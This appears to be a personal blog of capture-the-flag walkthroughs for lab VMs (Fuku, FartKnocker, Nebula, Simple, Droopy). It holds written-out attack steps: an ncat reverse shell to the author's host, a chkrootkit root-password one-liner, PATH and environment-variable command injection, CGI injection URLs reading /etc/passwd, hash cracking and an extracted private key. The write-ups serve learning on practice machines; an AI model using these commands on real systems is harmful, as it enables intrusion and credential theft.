Walkthrough Fuku

I have just finished another VM. The very annoying, but fun, machine called Fuku. As in Fuck you, I guess. It was designed to really mess with the challenger.

Okay, so let’s get started.

So after scanning the machine I saw that all ports were open. But only ssh port 22 was a real service. I tried a few basic password on it, but I got blocket pretty fast. I am guessing some fail2ban serivce. The rest of the ports just outputed a FUKU note. So they were just false positives. So I wrote a python-script to try out every port possible. But that wasn’t easy. First I wrote it to check for the return-length. But that didn’t return anything. So that we quite annoying. And I also added multithread to be able to check the ports faster:

from multiprocessing.dummy import Pool as ThreadPool
pool = ThreadPool(2)
results = pool.map(testPorts, minArr)

SO then I had to rewrite the script to make a get-request instead. Anyhow, I found the joomla service on port 13370 after a lot of work. And I ran joomscan on it and found a lot of vulnerabilities. Especially a vulnerability that creates a admin-user for you. So I did that. Here is the exploit I used: https://www.exploit-db.com/exploits/6234/

The page was in japanese, but it wasn’t that hard to create the admin-user. But once I was in it was really difficult to understand what was going on. I though I changed the language so many times. And I tried to change it. At one point I thought english had been removed completely just for the sake of FUKU. But in the end I found it.

Then came the next challenge. How to upload a shell. I tried to turn off all forms of editors to be able to insert php, but nothing worked. So I tried to enable ftp, but that didn’t work since that port was already in use. I tried to upload a shell through the media-uploads, but that blocked the code. So after some heacy googeling on how to run php I ended up installning the DirectPhp-plugin. This one: http://www.kksou.com/php-gtk2/joomla/directphp-plugin.php#download

So I uploaded my reverse-shell and got in.

The first thing I wanted to do was to spawn a shell:

$ python -c 'import pty; pty.spawn("/bin/sh")'
haha! FUKU! Only root can run that command.

That together with a few other commands was blocked. And since I couldn’t get a tty-shell I was unable to use sudo and su.

So I started to mess around with the mysql-database. Which was quite difficult without a tty-shell. It was really buggy. Oh yeah, I found the mysql-login credencials in configuration.php in /var/www/html. So I looked around in the databse fuku and found gizmos user. So I got the hash and cracked it with hashcat.

hashcat -m 11 -a 0 -o found.txt admin.hash /usr/share/hashcat/rules/rockyou-30000.rule

Only to find that gizmo used the same password to his user as for the database. sillyboy. So that was not so useful. There was also another admin-user and a admin-account in tacacs. “admin ht70zyjHsMl3A”.

So I transfered my enumeration-script and started enumerating. I found that it was a ubuntu-15.04 machine. So I figured to could try the standard overlay-exploits that work on quite a few ubuntus. But gcc was somehow blocked.

www-data@Fuku:/tmp$ gcc exp.c -o exp
gcc exp.c -o exp
haha! FUKU! Only root can run that command.

So I compiled the the exploit on my machine and then did a wget to transfer it. But it wouldn’t run since www-data lacked certain rights.

Then I got stuck for quite some time. ANd I cheated a bit, just to read the words chrootkit. So I found that program running and I looked for an exploit for it. And found this: https://www.exploit-db.com/exploits/33899/
Pretty crazy exploit. A incredible priv-esc exploit from a program that attempts to stop rootkits. So after a few trial and error with using the exploit I finally just wrote:

echo "echo root:adminadmin | chpasswd" > update

And then I logged in using ssh. But that was after going a bit crazy in trying to get a tty-shell for www-data. So that was it. I got root and the flag.

Yep, this is a flag. It's worth over 9000 Internet points!
Random keyboard smash: lkhI6u%RdFEtDjJKIuuiI7i&*iuGf)8$d4gfh%4

In the root-folder was all the programs and rools that I was blocked from using.

19700101      chkrootkit-0.49  flag.txt  g++-4.9  gcc-4.9  gcc-ar-4.9  gcc-nm-4.9  gcc-ranlib-4.9  ifconfig  mlocate    python     uname  whoami
change_ip.sh  cpp-4.9          fuku      gcc      gcc-ar   gcc-nm      gcc-ranlib  id              locate    portspoof  python2.7  which

Conclusion

I spent a lot of time writing the python-script. So that was a good learning-experience. Finding the chrootkit-was probably the hardest. I should have seen that it was a unusual service. All in all a really fun challenge! Thanks https://www.vulnhub.com/author/robert-winkel,190/ Robert Winkel for the machine! Frustrating but fun!

Walkthrough FartKnocker

Another VM is done. Here is the writeup. And here is the link to the VM on vulnhub.

Recon

$ netdiscover -r 192.168.1.1/24 
192.168.1.103   08:00:27:3d:0d:c8      1      60  Cadmus Computer System

The Nmap-scan.

Not shown: 65534 closed ports
Reason: 65534 resets
PORT   STATE SERVICE REASON         VERSION
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:3D:0D:C8 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.4
TCP/IP fingerprint:
OS:SCAN(V=7.12%E=4%D=5/9%OT=80%CT=1%CU=42070%PV=Y%DS=1%DC=D%G=Y%M=080027%TM
OS:=57311E63%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=106%TI=Z%CI=I%II=I%
OS:TS=8)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5
OS:=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=
OS:7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%
OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0
OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S
OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R
OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N
OS:%T=40%CD=S)

So port 80 is the only one open. An interesting little detail here is that it says that it found “65534 closed ports”, and then it says: Reason: 65534 resets. I think that means that the server has responded with RST/ACK. Something I learned in this challenge. But we will get to that.

On port 80 we find a file named pcap1.pcap. So I open it up in wireshark.
To the experienced packet-inspector I guess that it is quite obvious what is going on in this packet-capture. But I had never heard about port-knocking. So I got lost on a detour for quite some time. I was inspecting the ICMP-packets. All of those packets ended with “!”#$%&'()*+,-./01234567”. Something that I though was suspicious. So I started googeling about hacks that use ICMP and found a lot.

It turns out that you can use the ICMP-protocol to hide, or tunnel, other services. So I thought that someone had injected a Loki-rootkit into the server, and what I was observing was the communication between the hacker (with ip …102) and the victim-server. And that I was supposed to enter through the same exploit. But after going through the ICMP-packets in detail I realized that they really were just pings, and nothing else. They never contained more data than the default “!”#$%&'()*+,-./01234567”, which I learned could be used to fingerprint the server. This data meant that the server probably was a linux. So after discarding all the ICMP packets I started to look into the TCP-packets more closely. And after some creative googeling about ports I learned about port-knocking.

Port knocking

So I downloaded knockd, that is used to implement port-knocking. And I got it to work by running this command:

knock 192.168.1.103 7000 8000 9000
nc 192.168.1.103 8888

This also worked:

for x in 7000 8000 9000; do nmap -Pn --host_timeout 201 --max-retries 0 -p $x 192.168.1.103; done
nc 192.168.1.103 8888

And this:

nc 192.168.1.103 7000
nc 192.168.1.103 8000
nc 192.168.1.103 9000
nc 192.168.1.103 8888

Anyways, it lead me to this address: /burgerworld. I downloaded the pcap-file and continued. I went through each and every packet in detail to understand how they all worked. But I am not going to bore you with that. So I right-clicked on a TCP-packet and then clicked on follow tcp-stream. And it showed me a nice ascii-image of beavis (or butthead, can’t remember who’s who). And the text: eins drei drei sieben. So I google-translated the text, and it was what I though, the classic number 1337. So after trying every single possible combination of portknocking I finally figured out that it was supposed to be 1 3 3 7. And then nc to port 1337. There I found: /iamcornholio/ which gave me this text:

“huhhuhhh…Hey Beavis…Im all about uhhh…huhuh…that base huhhuhhh…

T3BlbiB1cCBTU0g6IDg4ODggOTk5OSA3Nzc3IDY2NjYK”
So the base-comment made me think that it was probably base64-encoded. And it was.

It translated into: Open up SSH: 8888 9999 7777 6666
So I knocked the port and got access to port 22.

$ ssh root@192.168.1.103                                                   1 ↵
The authenticity of host '192.168.1.103 (192.168.1.103)' can't be established.
ECDSA key fingerprint is SHA256:uSdkKIWXcJl0j0P5Y+cAzjD9CJOFQ/NxtG8kz8ptzFE.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.103' (ECDSA) to the list of known hosts.
############################################
# CONGRATS! YOU HAVE OPENED THE SSH SERVER #
# USERNAME: butthead                       #
# PASSWORD: nachosrule                     #
############################################

So I logged in as butthead, but was immedietly thrown out.

From doing some challenges on overthewire I learned that you can execute commands with SSH without getting an actual shell.

But first I downloaded sshpass to be able to make the process a bit easier, and then:

sshpass -p nachosrule ssh butthead@192.168.1.103 ls
nachos

So then I used nc to get a permanent shell.

$ sshpass -p nachosrule ssh butthead@192.168.1.103 "ncat -e /bin/sh 192.168.1.106 1234"

Escalation

So I got a shell, and it was time to escalate.
I ran the linEnum.sh script and waded through the info. And checked for vulns on sudo. But nothing really of interest. Some meaningless tuff in /tmp, some scripts in beavis. Then I found pcap3 and pcap4. That I studied thoroughly. In pcap4 I saw that there was some ssh-keychanges going on, and some encrypted data-transfer. But after some googeling I concluded that there is not really any way I could possibly break that. SSH with Diffie-hellman seems pretty waterproof.

In the end I ended up running the Ubuntu 14 priv-exploit that I have used on some other VM:s. This one: https://www.exploit-db.com/exploits/37292/. That exploit really is incredible/incredibly dangerous.

So I became root and got the SECRETZ in /root.

Conclusion

Packet-analysis really was awesome. A lot of fun and interesting stuff. I feel like I have really started to get a grip of how packets are structured, and started to get to know Wireshark a lot more. So the main takeaways from this VM really was learning packet-analysis and about port-knocking.

Thanks to top-hat-sec for another great VM!

After reading other writeups I learned about https://digi.ninja/projects/cewl.php. Which I am really excited about trying out. Gonna try it soon.

Nebula Walkthrough

I started doing the challenges in Nebula. They are not as fun as boot2root VM:s but still entertaining. And I have learned some new stuff from it.
I have decided to write down all the levels in this one post, otherwise it would be too many short posts. So this is going to be a giant one, and sometimes way to much detail, and somtimes not enough, of well. Let’s start.

Level 00

We just need to find the flag on this level.

$ find / -user flag00 -perm -4000 -exec ls -ldb {} \; 2>/dev/null
-rwsr-x--- 1 flag00 level00 7358 2011-11-20 21:22 /bin/.../flag00
-rwsr-x--- 1 flag00 level00 7358 2011-11-20 21:22 /rofs/bin/.../flag00

Search for user flag00, with permission 4000, executable. List the
output. Throw stderr in /dev/null.

cd /bin
cd "..."
./flag00
getflag

Level 01

On this level we are provided with code written in C and the binary version of it. It can be found here: /home/flag01/flag01

$ file flag01
flag01: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped

So we know that it is a 32bit setuid-binary. So when we run the binary the code that gets executed gets executed as the user flag01.

total 13
drwxr-x--- 2 flag01 level01   92 2011-11-20 21:22 .
drwxr-xr-x 1 root   root     100 2012-08-27 07:18 ..
-rw-r--r-- 1 flag01 flag01   220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 flag01 flag01  3353 2011-05-18 02:54 .bashrc
-rwsr-x--- 1 flag01 level01 7322 2011-11-20 21:22 flag01
-rw-r--r-- 1 flag01 flag01   675 2011-05-18 02:54 .profile

Since I am a total noob in C I am going to comment this code pretty heavy to understand what is going on.

#include <stdlib.h>
// This is what is says. C's standard library. Useful general
// purpose functions. Generating random numbers, conversions, memory allocation: malloc
// process control. It is from this lib that "system" is taken.

#include <unistd.h>
// Provides access to POSIX API.
// Gives the programmer access to NULL pointer, and symbolic constants like SEEK_SET

#include <string.h>
// A library for manipulating strings.

#include <sys/types.h>
// This library gives access to different data-types. Like gid_t.

#include <stdio.h>
// The standard input and output library.
// printf and scanf are among those functions. printf outputs, and scanf takes input.

int main(int argc, char **argv, char **envp)
// Here we initiate the main function, we do this with three arguments.
// argc is the number of argumnets. Argument count. The count starts from the
// calling of the binary. So ./flag01 is the first argument.
// argv are the argumnets that the user inputs. In this program it appears to be none.
// envp is an array of the environment variables.
{

  gid_t gid;
  uid_t uid;
// Here we declare two variables, but we don't assign them any value.
// We use the data-typs that come from sys/types-lib.
// The data-types are group-id and user-id.

  gid = getegid();
  uid = geteuid();

// This gets the group-id and user-id of the current user. Which is flag01.
// And we assign the the value to the previously created variables.

  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);

// So this sets the real, effective and saved uID.

  system("/usr/bin/env echo and now what?");

// This uses the system-function, which let us use the unix-commands/programs.
// The commands run are first printing the environment variables, and then it echos "and now what?"

}

How can this then be exploited? Since there is no user-input.
So I figure that I can overwrite the echo-command with a command that I call echo, but does something else.

This kind of explains the way to do this.
link

So I wrote that program in bash

#!/bin/bash
/bin/bash

Then chmod +x echo, and export PATH=/tmp:$PATH. Now, it is important here to add the echo to the beginning of the PATH-variable, otherwise it will execute the normal echo.

./flag01
whoami
flag01

We got the flag!

Level 02

So on this level we have another setuid to play with.

cd /home/flag02
level02@nebula:/home/flag02$ file flag02
flag02: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped

Let’s run it and see what happens.

level02@nebula:/home/flag02$ ./flag02
about to call system("/bin/echo level02 is cool")
level02 is cool

This looks a bit like the first level. But let’s analyze the code.

#include <stdlib.h>
// Standard-lib.

#include <unistd.h>
// Lib to get getegid()

#include <string.h>
// Lib to manipulate strings

#include <sys/types.h>
// Get new data-types, like gid_t

#include <stdio.h>
// Standard i/o. printf, scanf for example

int main(int argc, char **argv, char **envp)
{
  char *buffer;

// Declare the variable buffer.

  gid_t gid;
  uid_t uid;

// Declare variables.

  gid = getegid();
  uid = geteuid();

// Assign uID and gID into the created varibles.

  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);

// Set UID.

  buffer = NULL;

// Assign the value NULL to the buffer-varible.

  asprintf(&buffer, "/bin/echo %s is cool", getenv("USER"));
// Lets break it down.
// asprintf auto-allocate memory, it doesn't have to receive a specific buffer-size.
// it acquires it dynamically. In a way it is a way to defend against buffer overflow. Since the buffer cant be overflown because it is dynamic, I think.
// asprinf calculates the length of the string, allocates the amount of memory
// and then writes the string into that memory.

  printf("about to call system(\"%s\")\n", buffer);

// So, the asprintf takes the getenv-username and inputs it into the buffer.
// Then we make a system-call using that buffer.

  system(buffer);
}

Okay, so no user-input is possible. So the solution will be elsewhere.
So we make a system-call that is the following:
“/bin/echo username (taken from en-var) is cool”

So the solution that comes to mind is to insert a username that would be something like
the following: hello && /bin/bash # echo

So I set the username in my environment variable like this:

USER="&& /bin/bash #"

Then I ran the script, and it gave me the shell, and
then I could just run getflag.

Level 03

So on this level we have one file and one directory.

level03@nebula:/home/flag03$ ls -lah
total 5.5K
drwxr-x--- 3 flag03 level03  103 2011-11-20 20:39 .
drwxr-xr-x 1 root   root     180 2012-08-27 07:18 ..
-rw-r--r-- 1 flag03 flag03   220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 flag03 flag03  3.3K 2011-05-18 02:54 .bashrc
-rw-r--r-- 1 flag03 flag03   675 2011-05-18 02:54 .profile
drwxrwxrwx 2 flag03 flag03     3 2012-08-18 05:24 writable.d
-rwxr-xr-x 1 flag03 flag03    98 2011-11-20 21:22 writable.sh

The dir is read and writable. And the writable.sh-file looks like this:

#!/bin/sh
for i in /home/flag03/writable.d/* ; 
	(ulimit -t 5; bash -x "$i")
	rm -f "$i"
done

So here we can se that it takes all the scripts in writable.d and executes them, every few minutes, with a cronjob.
So after a lot of work, and a lot of testing. Like copying the sh and much other. i realized I didn’t have to get a shell, all i need is to execute getflag on the machine.

So I just wrote the following script:

#!/bin/bash
getflag > /tmp/flaggan.txt

I also tried to copy the shell from the flag03-user and give me permissions to use it, but it didn’t work. Not really sure why. But anyways, I got the flag.

Level 04

“About
This level requires you to read the token file, but the code restricts the files that can be read. Find a way to bypass it 🙂
To do this level, log in as the level04 account with the password level04. Files for this level can be found in /home/flag04.”

#include <stdlib.h>
// Standard lib

#include <unistd.h>
// getresid comes from here i think

#include <string.h>
// Lib to manipulate strings

#include <sys/types.h>
// Includes the datatype guid

#include <stdio.h>
// Standard I/O

#include <fcntl.h>
// The file control-options.
// To input output files, open them, close them, open dirs etc

int main(int argc, char **argv, char **envp)
{
  char buf[1024];
// Here the buffer. The buffer is a kind of intermediare between memory and program.
// So the buffer have a maximum of 1024 bytes. That is one kilobyte.

  int fd, rc;
// Here we declare two variables.

  if(argc == 1) {
    // What to do if there is only one cli-argument.
      printf("%s [file to read]\n", argv[0]);
      exit(EXIT_FAILURE);
    // EXIT_FAILURE comes from some std lib.
    // This seems to be mostly harmless.
  }

  if(strstr(argv[1], "token") != NULL) {
    // So this occurs only if the variable name is token.
    // strstr evaluates if the first argument contains anything from the second.
    // So we can't ever read any file that contains the word token in it.
      printf("You may not access '%s'\n", argv[1]);
      exit(EXIT_FAILURE);
  }

  fd = open(argv[1], O_RDONLY);
  // Here we initialize and declare the fd variable.
  // It appears to open the file, in a read-only manner, and then save it in
  // the variable fd.

  if(fd == -1) {
    // This statement fires if a file doesn't exist, I think.
      err(EXIT_FAILURE, "Unable to open %s", argv[1]);
  }

  rc = read(fd, buf, sizeof(buf));

// So here we take the input file, and read it. The buffer-size is here.


  if(rc == -1) {
    // If the file somehow doesn't exists it throws this error.
      err(EXIT_FAILURE, "Unable to read fd %d", fd);
  }

  write(1, buf, rc);
  // Here we write to standard out (the 1 indicates it).
}

I started trying to encode the file name and some other stuff, that didn’t work. Then it hit me. I can just create a link.

level04@nebula:/tmp/04$ ln -s /home/flag04/token ./test
level04@nebula:/tmp/04$ ls
test  test.sh
level04@nebula:/tmp/04$ /home/flag04/flag04 ./test
06508b5e-8909-4f38-b630-fdb148a848a2

Wohoo, it worked!

Level 5

About
Check the flag05 home directory. You are looking for weak directory permissions
To do this level, log in as the level05 account with the password level05. Files for this level can be found in /home/flag05.

So I just read the files.

level05@nebula:/home/flag05/.backup$ tar -Oxf backup-19072011.tgz .ssh/id_rsa.pub

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDLAINcUvucamDG5PzLxljLOJ/nrkzot7EQJ9pEWXoQJC0/ZWm+ezhFHQd5UWlkwPZ2FBDvqxdcrgmmHT/FVGBjK0XWGwIkuJ50nf5pbJExi2SC9kNMMMP2VgY/OxvcUuoGhzEISlgkuu4hJjVh3NeliAgERVzxKCrxSvW48wcAxg4v5vceBra6lY7u8FT2D3VIsHogzKN77Z2g7k2qY82A0vOqw82e/h6IXLjpYwBur0rm0/u3GFB1HFhnAxuGcn4IsnQSBdQCB2S+eOUZ4PmiQ/rUSHuVvMeLCzrxKR+UG9zDwoCwwXpNJehAQJGCiL3JzBNnLjFaylSqKP6xj7cR user@wwwbugs
level05@nebula:/home/flag05/.backup$ tar -Oxf backup-19072011.tgz .ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAywCDXFL7nGpgxuT8y8ZYyzif565M6LexECfaRFl6ECQtP2Vp
vns4RR0HeVFpZMD2dhQQ76sXXK4Jph0/xVRgYytF1hsCJLiedJ3+aWyRMYtkgvZD
TDDD9lYGPzsb3FLqBocxCEpYJLruISY1YdzXpYgIBEVc8Sgq8Ur1uPMHAMYOL+b3
Hga2upWO7vBU9g91SLB6IMyje+2doO5NqmPNgNLzqsPNnv4eiFy46WMAbq9K5tP7
txhQdRxYZwMbhnJ+CLJ0EgXUAgdkvnjlGeD5okP61Eh7lbzHiws68SkflBvcw8KA
sMF6TSXoQECRgoi9ycwTZy4xWspUqij+sY+3EQIDAQABAoIBAAGir2w+/ufzs3Pm
xGKf5nc8rY0gSl5VnIeUyp1iWylmITcxifiO5ZUo9rZzgXXeWB37a2eC6V1Fya4c
7jaYx24FGzruXMYO9rfZzgLrbQAJL3YepcwnWGzTpJk90Kulv1zuGecHMk6ZcvGx
bRysutAKmIXwSR9oQ3BOOkyTKKtI6YeKSnUNU1KVO1t//ps2wFcfXRFb17prpokx
5clWwfUYRLBQlB4XjBIJ3tswpyC0PNOFfzoF+VeUlN9XZFrL0JWHX1F9DDOFJYL5
bXw7zwhjEvZ0/qOvZSJiH4lkbmANsBeMNY/JOGV6T7dWthKBGehCnupeADZVaSeo
Qlysa0ECgYEA6x4FwgpeqNtNGeCcSAUtoviTYMD5LfMEpY8t9eGdRpzw1CDlmG9x
k1LgzE3eA0qlJYx5NNqYEefIPVLdmSuSGS/5KqHeB8Ph7+WqLmguwIIIrfRJoPaD
ON2XqLU6YzAEazTrXnqALjOvP3qdN57xK0zoBAfYlkXJRgMYE1S23YsCgYEA3QhF
Fl11csPc2Yyz/7+9MG9JnOckYvuir+bf3fj/HEuIC9ylwXd4GfSLAW02Sg8DlfRh
M7MxCW9OEWtKgUtHe3fGc6/6X1yF7QfeAYZm8UX/fo6PxuX++mvfPxM4i6vRjgzB
Qy8WisqTK9nLZO+hEdPoVqalz0iUsvu2umz0CVMCgYAsNoUWrCSI1FR3XUmGMZMX
Zm8wbpltDpn9GCOobTjKIpEXEuiZ9bsB3T/wq2Poco0DtprEWabnFxMMlRyexRbA
LclJPw8lnqxKFIIgH+9KvCktrRZ7cl/SvbjbPNkx9cGe92Cbb6XTCl0WLtSJtRXc
8qVevKr59z2WMNbCK9gHaQKBgQDRaQNjpBohKFX2OytSU8uftuBMamV77iJ9e0SA
Hmc83IbBjkPwnwrHtHt6V4lG8yCXktgAznXYFX8mW7tT8gmAfcMkWgbhEFzGbFy2
nyqqzoG42sJ3U/KWOVtifAhns9qvNYBo8ZTu2+xBcHAWaj31EQqgBfU0BPT0+ixu
RcmThwKBgAi0ej7ylHhtwODQGghRmDpxEx9deJ0jilM2EnqIecJj5jnPW8BKDgV4
Dc1QljBeCQ1r30DGYmOIazbhm+orm4df6HWPayRhNBlkmulqTs5GHvLMPjcKMB0k
0Xna7QOtBAnzoHpLcrfvBdfRNE1eC87YkPUhmm5hBgG0+TeMmWgr
-----END RSA PRIVATE KEY-----

Then I saved it down and sshed into the flag-user.

level05@nebula:/tmp/05/.ssh$ ssh -i id_rsa flag05@192.168.1.105

Level 06

Old unix-passord-config. Okay, I know that passowrd were stored in /etc/passwd before they where stored in shadow.

cat /etc/passwd
flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh

Looks like it can be done with john the ripper.

So I just copy-pasted the hash into a file and then ran john on it like this

 $ john level06Hash
Using default input encoding: UTF-8
Loaded 1 password hash (descrypt, traditional crypt(3) [DES 128/128 AVX-16])
Press 'q' or Ctrl-C to abort, almost any other key for status
hello            (?)
1g 0:00:00:00 DONE 2/3 (2016-05-08 11:29) 2.777g/s 355.5p/s 355.5c/s 355.5C/s 123456..marley
Use the "--show" option to display all of the cracked passwords reliably
Session completed

So that was easy.

Level 07

This level was a bit tricky. It is about teching command injection.
So these articles were really useful.
link1
link2

So we have a few files.
.lesshst – that the history from the program less

level07@nebula:~$ cat .viminfo
# File marks:
'0  1  0  ~/index.cgi?Host=|getflag|
'1  1  0  ~/index.cgi

# Jumplist (newest first):
-'  1  0  ~/index.cgi?Host=|getflag|
-'  1  0  ~/index.cgi
-'  1  0  ~/index.cgi

# History of marks within files (newest to oldest):

> ~/index.cgi?Host=|getflag|
	"	1	0

And here is the cgi-code.

  #!/usr/bin/perl

  use CGI qw{param};

  print "Content-type: text/html\n\n";

  sub ping {
    $host = $_[0];

    print("<html><head><title>Ping results</title></head><body><pre>");

    @output = `ping -c 3 $host 2>&1`;
    foreach $line (@output) { print "$line"; }

    print("</pre></body></html>");

  }

  # check if Host set. if not, display normal page, etc

  ping(param("Host"));

I had never really looked at perl-code before. But it kind of made some sense I guess.

The config-file specified a port

# Specifies an alternate port number to listen on.
port=7007
dir=/home/flag07

So I found that port, and started curling to se what I could run. After a lot of trial and error
I found a way to do it:

curl “http://nebula.dev:7007/index.cgi?Host=www.google.com|getflag”
I also learned that you have to encode spaces correct otherwise the sever will get all confused. So if you wanna run any command with spaces you do it like this:
http://nebula.dev:7007/index.cgi?Host=%3Bcat%20/etc/passwd

I had to encode the semicolon. That was the key to it!

Level 08

This is for sure my favorite level so far. I really enjoy analyzing packets.
So first I moved the pcap-file to my computer with netcat, and then I opened it up in wireshark.

There was no http-requests. So I guess this traffic was not on the web.

There are two machines talking:
59.233.235.218 – 39247
59.233.235.223 – 12121

So looking at the packets we can tell that the machines are in Bejing, both of them. The source and destination corrdinates show that they are in the same place.
After looking up the ports I found this:
http://www.speedguide.net/port.php?port=12121

12121 	tcp 	trojans 	Backdoor.Balkart (2004.09.02) - a backdoor trojan horse that can act as a HTTP proxy or FTP server

Port is also IANA registered for NuPaper Session Service 	SG
12121 	tcp,udp 	nupaper-ss 	NuPaper Session Service 	IANA
12121 	tcp 	threat 	Balkart

Even though it doesn’t really say in the challenge what kind of traffic this is, I like to image that it was someone who had infected the 12121 computer with the Balkart-trojan. This one. But it doesn’t really matter, it is irrelevant for this challenge.

So I went over the packets and found some interesting ones.

 #'
 0000   ff fa 20 00 33 38 34 30 30 2c 33 38 34 30 30 ff  .. .38400,38400.
 0010   f0 ff fa 23 00 53 6f 64 61 43 61 6e 3a 30 ff f0  ...#.SodaCan:0..
 0020   ff fa 27 00 00 44 49 53 50 4c 41 59 01 53 6f 64  ..'..DISPLAY.Sod
 0030   61 43 61 6e 3a 30 ff f0 ff fa 18 00 78 74 65 72  aCan:0......xter
 0040   6d ff f0                                         m..

  38400,38400#SodaCan:0'DISPLAYSodaCan:0xterm
  ""bb	B
1!

But I couldn’t piece it all together. So after analyzing every single poacker separtely, I realized that the packages come and go in different
order, an order that doesn’t make sense. So I learned something reaally useful. Right-click on a package and then
click on: follow, and then tcp-stream. This way we can see the full interaction, all packets combined to one.

..%..%..&..... ..#..'..$..&..... ..#..'..$.. .....#.....'........... .38400,38400....#.SodaCan:0....'..DISPLAY.SodaCan:0......xterm.........."........!........"..".....b........b....	B.
..............................1.......!.."......"......!..........."........"..".............	..
.....................
Linux 2.6.38-8-generic-pae (::ffff:10.1.1.2) (pts/10)

..wwwbugs login: l.le.ev.ve.el.l8.8
level8
..
Password: backdoor...00Rm8.ate

Password: backd00Rmate
.
..
Login incorrect
wwwbugs login:

So the password looked pretty strange. And it didn’t work. But after I checked the tcp-stram in hex it became clear that the dot’s in the password was f7 in hex. f7 represents DEL. So every f7 was the user deleting letters. I guess he/she has problem remembering his/her own password.
So this:
Password: backdoor…00Rm8.ate
Became this:
Password: backd00Rmate

Level 09

I will continue some other day.

Walkthrough Simple

I tried out another vulnerable machine. This one was called Simple. And can be found here.

So I started out as usual by locating the machine.

 $ netdiscover -r 192.168.1.1/24 
 Currently scanning: Finished!   |   Screen View: Unique Hosts                                                                                                                                                                   2 Captured ARP Req/Rep packets, from 2 hosts.   Total size: 120                                                                                     
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.1.1     e8:de:27:31:15:ee      1      60  TP-LINK TECHNOLOGIES CO.,LTD.                                                                     
 192.168.1.103   08:00:27:60:21:5c      1      60  Cadmus Computer Systems       
nmap -A -O -T4 -p- -vv 192.168.1.102 

Only port 80 open. Si I browser over there.
I was met by an the interface of some kind of new-service called CuteNews. It had the version written on the first page. CuteNews v.2.0.3. And what I had learned from the last VM I did was that it is always a good idea to search for exploits (duh). So before going a head with dirbuster/zap/nikto/whatevs I just searched fore CuteNews in exploit-db. And that was a great idea.
So I just checked out the very first that came up, and it looked easy. It was this one. So I went ahead and created and account, renamed my php-reverse-shell.php to shell.jpg. Then I intercepted it with burp-suite and changed the name back to php.
And then I just started nc with nv -lvp 4444. And after visiting: cutenews.dev/uploads/avatar_username_shell.php I was rewarded with a shell.
I sent over my enumeration-script that I am working on with netcat.

nc -lvp 3333 > enum.sh
nc 192.168.1.103 < enum.sh

I soon found out that it has the same privesc-vulnerability as the machine I was working on the other day. So I already had the exploit ready to go. It was this one. I sent it over with netcat and then compiled it with gcc, then chmod +x. And then I was root, and got the flag in the /root folder.

Exploit

Conclusion

I felt like all the hard work before really payed off on this one. I knew the exploits, I knew how to transfer files easily. This was a great little project.

Walkthrough Droopy

Another walkthrough. This time for the Droopy-vm. It can be found here on vulnhub.com

I tried out netdiscover, just to learn something new. I have seen that other people use it. It turns out that it works to find hosts on the network. It works by sending out ARP-requests throughout the network and loggin the requests. I am not really sure if nmap is using a different technique. But it is good to know that there is an alternative to nmap for it.

netdiscover -r 192.168.1.0/24
 Currently scanning: Finished!   |   Screen View: Unique
Hosts                                                                 
 2 Captured ARP Req/Rep packets, from 2 hosts.   Total size: 120                                                                                     
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.1.1     e8:de:27:31:15:ee      1      60  TP-LINK TECHNOLOGIES CO.,LTD.                                                                     
 192.168.1.104   08:00:27:65:24:9c      1      60  Cadmus Computer Systems 

So I ran nmap.

nmap -vvv -A -T4 -O 192.168.1.104

PORT   STATE SERVICE REASON         VERSION
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: B6341DFC213100C61DB4FB8775878CEC
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 36 disallowed entries 
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
| /LICENSE.txt /MAINTAINERS.txt /update.php /UPGRADE.txt /xmlrpc.php 
| /admin/ /comment/reply/ /filter/tips/ /node/add/ /search/ 
| /user/register/ /user/password/ /user/login/ /user/logout/ /?q=admin/ 
